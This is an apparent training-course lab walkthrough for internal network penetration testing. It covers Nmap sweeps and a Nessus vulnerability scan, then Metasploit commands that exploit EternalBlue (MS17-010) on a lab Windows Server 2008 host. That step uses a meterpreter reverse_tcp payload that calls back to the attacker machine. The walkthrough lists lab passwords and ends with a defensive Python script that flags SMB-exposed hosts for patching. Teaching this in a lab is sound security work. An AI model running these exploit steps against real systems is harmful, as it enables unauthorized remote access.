
Module 06: Network Penetration Testing Methodology-Internal 9

Written By AKADEMY on Wednesday, July 3, 2019 | 11:18 AM

Exercise 9: Exploiting Windows OS Vulnerability

Scenario

Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access.
As an expert penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.
Lab Duration: 30 Minutes
  1. Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  2. Type root in the Username field and click Next.
    Screenshot
  3. Type toor in the Password field and click Sign In.
    Screenshot
  4. In this lab, we will scan a subnet for live machines, select one machine, and pentest it to gain access.
    To do a quick scan, we will run a ping sweep using Nmap. In this lab, we are choosing an internal network (Subnet D) for pentesting.
    Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
    This displays all the hosts that are up in the network within a minute. In this lab, we are choosing 172.20.20.9 (Advertisement Dept. Subnet D) as our target.
    Screenshot
  5. Now, we shall scan the Advertisement Dept. Subnet D machine to view its open ports, the running services along with their versions, and the underlying operating system.
    Type nmap -T4 -A 172.20.20.9 and press Enter.
    Nmap takes approximately 3 minutes to complete the scan. Upon scan completion, you will observe that port 445 is open and the underlying operating system is Windows Server 2008 R2.
    Close the terminal.
    Screenshot
  6. Now, we shall perform a vulnerability scan on Advertisement Dept. Subnet D using Nessus in Windows Server 2012 (Internal Network).
    You may additionally look for pre-existing vulnerabilities associated with the identified version of services/operating system in searchsploit/exploit-db.
  7. Click Windows Server 2012 (Internal Network) and press Ctrl+Alt+Delete.
    Screenshot
  8. In the password field, type Pa$$w0rd and press Enter.
    You can use the Type Password option from the Commands menu to enter the password.
    Screenshot
  9. To launch the Firefox browser, double-click the Firefox icon on the Desktop.
    You can also click the Firefox icon on the taskbar or launch it from the Start menu apps.
    Screenshot
  10. The Firefox main window appears. Type https://localhost:8834 in the address bar of Firefox and press Enter.
    Screenshot
  11. A webpage appears stating that your connection is not secure. Click Advanced.
    Screenshot
  12. Click Add Exception… button.
    Screenshot
  13. Add Security Exception window appears; click Confirm Security Exception.
    Screenshot
  14. The Nessus/Login page appears.
    Type the following credentials and click Sign In:
    Username: admin
    Password: qwerty@123
    If the login page does not appear, go to Control Panel --> Administrative Tools --> Services and restart the Tenable Nessus service. Once done, reload the webpage.
    Screenshot
  15. After successful login, go to the Nessus Policies window and click the Create a new policy link.
    If any notifications appear at the top right corner of the window, ignore them.
    Nessus will automatically log off if you leave the browser window idle for 5 mins.
    Screenshot
  16. Policy Templates window appears with Scanner Templates as shown in the screenshot below.
    Screenshot
  17. In the Scanner section, click the Advanced Scan policy.
    Screenshot
  18. Advanced Scan policy window appears displaying the Settings tab.
    In the Basic settings under the General section, specify a policy name in the Name field (here, System_Scan) and give a description of the policy.
    Once done, leave the Permissions section with the default setting and click on Discovery in the left pane.
    In this lab, we will be scanning Advertisement Dept Subnet D machine (Windows Server 2008).
    Screenshot
  19. Once you click DISCOVERY, a drop-down list of three options appears: Host Discovery, Port Scanning, and Service Discovery. Now we are going to configure the Host Discovery settings.
    In the Host Discovery settings, toggle the Ping Remote Host option to turn it off.
    Scroll down if you want to view the rest of the settings in Host Discovery module.
    Screenshot
  20. In the Port Scanning module, check the Verify open TCP ports found by local port enumerators option.
    Leaving the other settings to default, click ASSESSMENT from the left pane.
    Screenshot
  21. Once you click the ASSESSMENT module, it will show you the General settings where you can see the Accuracy, Antivirus definition grace period, and SMTP options. Here you can leave the settings to default, and click Brute Force from the left pane.
    Screenshot
  22. In the Brute Force settings, make sure that the Only use credentials provided by the user option is checked under the General Settings section, and then click the Web Applications module in the left pane.
    Screenshot
  23. In the Web Application module, if you have any web applications hosted on the network, turn the setting ON; otherwise leave it at the default. Then click the Windows module in the left pane. In this lab, we have left the setting at its default (turned off), as there is no web application hosted on the target machine.
    You can turn it on by toggling the Scan web applications switch.
    Screenshot
  24. In Windows module, make sure that Request Information about the SMB Domain is checked, and leave the other settings to default. Now click on the REPORT module from the left pane.
    You can also specify the Start UID and End UID in Enumerate Domain Users and Local Users.
    Screenshot
  25. In the REPORT module, leave all the settings to default and click ADVANCED from the left pane.
    Screenshot
  26. In the Advanced module, scroll down to the Performance Options section and set Max simultaneous hosts per scan to 100, Max number of concurrent TCP sessions per host to unlimited, and Max number of concurrent TCP sessions per scan to unlimited. After configuring these options, scroll up the window and click the Credentials module.
    Screenshot
  27. The Credentials module displays the Cloud Services, Database, Host, Miscellaneous, and Plaintext Authentication options. You can activate any of these by choosing them from the left pane.
    In this lab, we have kept the settings to default. Now, click on the Plugins module to view the available plugins.
    Screenshot
  28. In the Plugins module, Nessus displays all the plugins and their information. Here you may choose plugins according to your target network, and then click the Save button to save the new policy.
    In this lab, we are not selecting any plugins.
    Screenshot
  29. The created policy is now saved in the Policies section, as shown in the screenshot below:
    Screenshot
  30. To begin a new scan, click My Scans in the left pane.
    Screenshot
  31. Click Create a New Scan link to create a new scan.
    Screenshot
  32. Once you click on the New Scan button, it will redirect you to Scan Templates window, where you need to select the policy you have created.
    The created policy is present in the User Defined Policies section, so click the User Defined tab.
    Screenshot
  33. The User Defined policy section appears; click the System_Scan policy.
    Screenshot
  34. The Settings section of the Scan Templates appears.
    Set a name for the scan in the Name Text field (here, Advertisement Dept.), type a description for the scan in the Description field, leave the Folder field set to default and enter the IP address of Advertisement Dept. machine in the Targets text field (here, 172.20.20.9).
    Click on the Schedule module in the left pane.
    You can specify a multiple number of machines to scan using Nessus. For lab demonstration, we are using a single machine.
    Screenshot
  35. The Schedule section allows you to specify the frequency of the scan. In this section, you can specify how often you want Nessus to scan the target machine.
    Leave this setting at its default, click the Save drop-down menu, and click Launch. This will launch a vulnerability scan on the Advertisement Dept. Subnet D machine.
    Screenshot
  36. As soon as you click the Launch link, Nessus will begin the scan on the Advertisement Dept. Subnet D machine as shown in the screenshot below.
    It will take around 10 minutes to scan the machine.
    Screenshot
  37. Once the scan is completed, it will display a tickmark as shown in the screenshot.
    Screenshot
  38. Click Advertisement Dept. to view the scan result.
    Screenshot
  39. Click on 172.20.20.9 to view all the vulnerabilities associated with it.
    Screenshot
  40. A list of vulnerabilities is displayed for this host as shown in the screenshot below:
    Screenshot
  41. Click Export and select a format (here, HTML) in order to export the result.
    Screenshot
  42. The Export as HTML pop-up appears, choose Executive Summary from the drop-down list and click on the Export button.
    Screenshot
  43. A dialog box appears, asking you to either open or save the file. Click Save File and click OK.
    Screenshot
  44. Now, click the folder icon (Open Containing Folder) in the notification popup that appears once the download completes.
    The file will be downloaded in the default download location of browser i.e., C:\Users\Administrator\Downloads.
    Screenshot
  45. Double-click on the downloaded file to view the result.
    If you are asked How do you want to open this type of file (.html)?, choose a web browser to view the report. In this lab, we are using the Firefox browser (1st icon in the list).
    Screenshot
  46. The generated report appears as shown in the screenshot. Click Show Details to view the complete details of the vulnerabilities.
    Scroll down to analyze the complete report.
    Screenshot
  47. Now, we shall choose a vulnerability found in the target machine and attempt to exploit it using a Metasploit module. In this lab, we shall exploit a recently discovered vulnerability (Eternal Blue) associated with MS17-010 (CVE-2017-0143). Before performing the exploitation, ensure that the victim machine Advertisement Dept. Subnet D is powered on.
    Switch back to the Kali Linux (Internal Network) machine.
    Screenshot
  48. Launch a Command Line Terminal from the taskbar.
    Screenshot
  49. Type msfconsole command and press Enter to launch the Metasploit framework console.
    Now, we shall check if the Advertisement Dept. Subnet D machine is vulnerable to Eternal Blue using smb_ms17_010 auxiliary scanner.
    Screenshot
  50. Type use auxiliary/scanner/smb/smb_ms17_010 in the msfconsole and press Enter to use the module.
    Screenshot
  51. Now, type set rhosts 172.20.20.9 and press Enter to set the target as Advertisement Dept. Subnet D.
    Screenshot
  52. Type run and press Enter to check if the machine is vulnerable.
    You will observe that Advertisement Dept. Subnet D (Windows Server 2008) is vulnerable to Eternal Blue as shown in the screenshot below:
    Screenshot
  53. Now, we shall search for the Eternal Blue exploit. Type search eternal blue in the msfconsole and press Enter. This displays the scanner and the exploit associated with Eternal Blue, as shown in the screenshot.
    We will be using the eternalblue_doublepulsar exploit to compromise the target machine.
    Screenshot
  54. Type use exploit/windows/smb/eternalblue_doublepulsar in msfconsole and press Enter.
    Screenshot
  55. Now, type show options and press Enter to view all the options associated with the exploit.
    Screenshot
  56. From the previous step, we know that we need to set the values of RHOST, processinject, and targetarchitecture. Setting the windows/x64/meterpreter/reverse_tcp payload increases the chance of gaining a meterpreter session.
    Issue the following commands in the msfconsole:
    1. set rhost 172.20.20.9
    2. set processinject lsass.exe
    3. set targetarchitecture x64
    4. set payload windows/x64/meterpreter/reverse_tcp
    5. set lhost 172.20.20.21
    172.20.20.21 is the IP address of the Kali Linux (Internal Network) machine.
    Screenshot
  57. Since we have set the options required for the exploit module, we will now perform exploitation on the target machine by triggering the exploit.
    So, type exploit and press Enter.
    Screenshot
  58. A meterpreter session has been attained, meaning that we have successfully exploited the smb vulnerability in the target machine using the Eternal Blue exploit.
    Sometimes, the options you set might not fetch you the meterpreter session. In such cases, you need to change the processinject and targetarchitecture values and perform the exploitation again.
    If you change the targetarchitecture, you need to change the architecture of the payload as well.
    Screenshot
  59. We have successfully exploited the smb vulnerability found in the target machine. Take a screenshot of the boot screen which appeared in the previous step and save it to the respective pentesting directory.
You have successfully scanned a network for vulnerabilities.
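As an added example (not part of the lab), the following Python script takes the defender's view of the Subnet D sweep: it parses the XML that Nmap writes with -oX for the scan in step 5 and lists every host exposing 445/tcp on an OS fingerprint that MS17-010 covers, so they can be prioritised for patching and SMBv1 removal rather than checked one at a time. The sample XML, its hosts and the AFFECTED_OS_MARKERS list are constructed assumptions, not real scan output.

```python
"""Triage helper for the Subnet D sweep (added example): parse Nmap -oX output and
list hosts exposing 445/tcp on an OS that MS17-010 covers. Nmap fingerprints are
heuristics; a credentialed Nessus check confirms the actual patch state."""
import xml.etree.ElementTree as ET

# Constructed sample in Nmap XML format (not real scan output): the lab target with
# SMB exposed on Windows Server 2008 R2 and a Linux host with only SSH open.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="172.20.20.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds"/>
      </port>
    </ports>
    <os><osmatch name="Microsoft Windows Server 2008 R2" accuracy="100"/></os>
  </host>
  <host><status state="up"/><address addr="172.20.20.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port></ports>
    <os><osmatch name="Linux 4.15" accuracy="95"/></os>
  </host>
</nmaprun>
"""

# Assumed marker list: OS families the MS17-010 bulletin addressed (matched against Nmap's osmatch name).
AFFECTED_OS_MARKERS = ("Windows Server 2008", "Windows Server 2012", "Windows 7", "Windows 8", "Windows 10")

def parse_hosts(xml_text):
    """Return [{'addr', 'open_tcp', 'os'}] for every host Nmap reported as up."""
    hosts = []
    for h in ET.fromstring(xml_text).findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in h.findall("address") if a.get("addrtype") == "ipv4"), None)
        open_tcp = set()
        for p in h.findall("ports/port"):
            state = p.find("state")
            if p.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
                open_tcp.add(int(p.get("portid")))
        osmatch = h.find("os/osmatch")  # Nmap lists the best match first
        hosts.append({"addr": addr, "open_tcp": open_tcp,
                      "os": osmatch.get("name") if osmatch is not None else ""})
    return hosts

def smb_exposure(hosts):
    """Addresses with 445/tcp open and an affected Windows fingerprint: patch and disable SMBv1 first."""
    return [h["addr"] for h in hosts
            if 445 in h["open_tcp"] and any(m in h["os"] for m in AFFECTED_OS_MARKERS)]
```

Run it against a real file with `parse_hosts(open("scan.xml").read())` after `nmap -T4 -A -oX scan.xml 172.20.20.1-255`; the 445-only rule is deliberately narrow, so extend the marker list or port set to match your estate.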